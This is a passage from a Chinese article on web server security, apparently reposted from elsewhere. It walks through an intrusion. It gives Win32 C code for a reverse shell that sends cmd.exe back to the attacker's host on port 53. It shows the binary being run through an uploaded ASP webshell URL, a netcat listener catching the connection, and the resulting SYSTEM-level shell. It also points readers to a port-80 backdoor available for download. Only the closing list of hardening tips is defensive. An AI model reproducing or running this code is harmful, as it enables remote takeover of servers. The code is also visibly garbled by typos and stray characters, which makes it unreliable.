内网建Web服务器的安全问题(2)

　　memset(&adik_sin，0，sizeof(adik_sin));

　　memset(&si，0，sizeof(si));

　　WSAStartuup(MAKEWORD(2，0)，&WSAdATA);

　　hSocket=WSASocket(AF_INET，

　　SOCK_STREMA，NULL，NULL，NULL，NULL);

　　adik_sin.sin_family=AF_INET;

　　adik_sin.sin_port=htons(53);//连接到我的主机53端口

　　adik_sin.sin_addr.s_addr=inet_addr("192.

　　168.0.1:);//我的主机的IP

　　connect(hSocket.(struct sockaddr*)璱k_sin，

　　sizeof(adik_sin);

　　si.cb=sizeof(si)

　　si.dwFlags-STARTF_USESTDHANDLES;

　　si.hStdlnput=si.hStdOutput=si.hStdError

　　=(void*)hSocket;

　　CreateProcess(NULL."cmd.exe"，NULL，

　　NULL，1，NULL，NULL，NULL，&si.&pi);

　　ExitProcess(0);

　　}

　　编译成a.exe然后上传上去先在本机用nc监听一个端口53，然后在IE里执行:

　　http://www.target.com/bbs/uploadimages/439587438739.asp?cmd=D:\inetpub\wwwroot\bbs\uploadimages\3215645664654.exe

　　D:\nc-1 -p 53

　　Microsoft Windows 2000[Version 5.00.2195]

　　版权任何1985-2000Microsoft Corp:

　　D:\inetpub\wwwroot\bbs\uploadimages>ipconfig

　　windows 2000 IP Configuration

　　Ethernet adapter本地连接:

　　Connection-specific DNS Suffix.:

　　IP Address..............:192.168.1.222

　　Subnet Mask.............:255.255.255.0

　　Default Gateway.........:192.168.1.1

　　D:\inetpub\wwwroot\bbs\uploadimages>

　　好了，到此为止，入侵基本上完成了，现在我们已拿到了一个system权限的交互式shell，我们能够"为所欲为"了。这个时候我们能够装一个后门，使得我们萄次进来不用这么麻烦，我以前写了"一个US-BACKDOOR。使我们能够通过80端口来"得到一个交互式的shell，且不影响，IIS程式本身的。正常运行。这个backdoor能够在我的主页上下载到。　　上面的几大失败使得我们每避一步人侵都取得了更多的权限，其实一个优秀的管理员完万能够避免这些。所以，一个小小的ASP程式错误都能够使您的服务器被Cracker破坏。程式员们，该注意一下您们的程式了。针对前面我提到的几大失败，我稍稍总绪一下管理"基本应该做到的地方:

　　(1)、不要使用已知漏洞很多的ASP程式，特别是像动网比较低的版本这类，即使使用了，也要经常去官方论坛看看比较新的漏洞信息，及时打补丁或升级程式。

　　(2)、假如没有必要用到FSO，能够禁用。

　　(3)、用cscls%systemroot%\winnt\cmd.exe/e/d guests命令，禁止掉GUESTS组用户访问cmd.exe。

　　(4)、尽量不要将数据库的密码以明文的形式放在ASP程式里面，能够使用数据源的形式来连接数据库。

　　(5)、一般用户应该用不到xp_crndshell这个扩展的，那么最好删掉xplog70.dll;尽量不要用sa这个用户。将sa的密码设复杂一些，能够另建一个用户，把权限调到最低。

　　后记

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有